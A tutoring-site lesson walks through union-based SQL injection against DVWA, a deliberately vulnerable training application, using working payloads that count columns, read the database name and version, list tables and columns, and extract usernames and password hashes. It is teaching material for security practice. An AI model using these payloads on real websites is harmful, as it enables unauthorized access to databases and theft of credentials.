Login
Signup as a Tutor

As a tutor you can connect with more than a million students and grow your network.

Union Based SQL Injection | DVWA (Legal)

Palvinder Singh
11 Jan 0 0

Union Based Injection:

Technology: php
Database: Mysql

The main objective of this injection is to access database, of the website, by just given some malicious sql inputs in front end and get an access of the backend of the website i.e there database (Username/Password).

DVWA: Damnn Vulnerable Web Application:
A legal application, for security proffesionals to test their skills in some legal platforms.

Union Based Sql Injection:

Dvwa: Low Level

Step 1: Find GET Method on website

url:

?id=1
?pid=98765
?clothes=jean
?product=ilk

?Something=something

By trying, every possible option on website i.e search, links, submit, help etc

Step 2: Try or Check for Exception Handling

?id=2'

try inverted comma('), after value of get method

Result:
If any sql error is there, images missing, content corrupted etc
=> Website is vulnerable for SQL Injection


Step 3: Check No. of Column: "order by"


id=2' order by 1--+   ==> Normal result
id=2' order by 2--+   ==> Normal result
id=2' order by 3--+   ==> Normal result
id=2' order by 4--+   ==> Normal result
id=2' order by 5--+   ==> error

So, No. of column = 4

Step 4: Check for vulnerable column no. among (1,2,3,4)

id=2' union select 1,2,3,4--+

Result= 2/3/1/4

This will show some random number on screen, that no. will be vulnerable for further injection

Step 5: Get name of database

database()

id=2' union select 1,database(),3,4--+  

Step 6: Get version of database

version()

id=2' union select 1,version(),3,4--+  

Step 7: Get list of tables

id=2' union select 1,table_name,3,4 from information_schema.tables--+  

Result: Will list all tables and we have to select those table name, which seems to be having sensitive information

admin
users
login
passwrds
credit
debit
card_details
..
..
etc

Step 8: Get Columns of selected table

id=2' union select 1,column_name,3,4 from information_schema.columns where table_name="users"--+

Result: user,password

Step 9: Get Data of respected column names

id=2' union select 1,user,3,4 from users--+

Result: This

id=2' union select 1,passowrd,3,4 from users--+

md5 encrypted password.

0 Dislike
Follow 2

Please Enter a comment

Submit

Other Lessons for You

9 Cybersecurity Trends & Predictions For 2018
The unpleasant cyber attacks of 2017 are still fresh in the minds of the people. To mention a few, they are Wanna Cry, Not Petya, Equifax, and etc. Evidently, the 'Cybersecurity' term which was known to...
VbScript Dictionary Objects
Dictionary objects are key value pairs object.One of the use of dictionary can be to find unique elements in a given set of data. Below is the example of the methods that can be used in dictionary: Set...
P

Praful | 19/12/2017

0 0
0
Sap Hana: How To Start Hana Studio & Start Hana System To Understand The Components And Views?
D-Click on SAP HANA Studio from the desktop. Use the login your user name and password which you got from the system adminstrator. Once login in to HANA system. Click on Add System if need to add first...

Mohamed S | 11/09/2017

1 1
0
Preparation Of Study Plan For PMP Exam Certification Tips
PMP Exam Study Plan: Preparing for the PMP exam is quite unlike what you did in school and college. Here the focus is not on memorization, but understanding the concepts, best practices, guidelines, and...

Icertglobal | 19/08/2017

0 0
0
What Is Shell Scripting?
Friends, Let us first understand what is shell? Shell is a layer on Unix Operating System. Shell is a user interface to Operating System. A user can communicate with Unix operating System through shell....

Sonal S. | 19/08/2017

2 0
0

Looking for Ethical Hacking & Cyber Security Training?

Find best Ethical Hacking & Cyber Security Training in your locality on UrbanPro.

Do you offer Ethical Hacking & Cyber Security Training?

Create Free Profile »
Sponsored

Find Best Ethical Hacking & Cyber Security Training?

Find Now »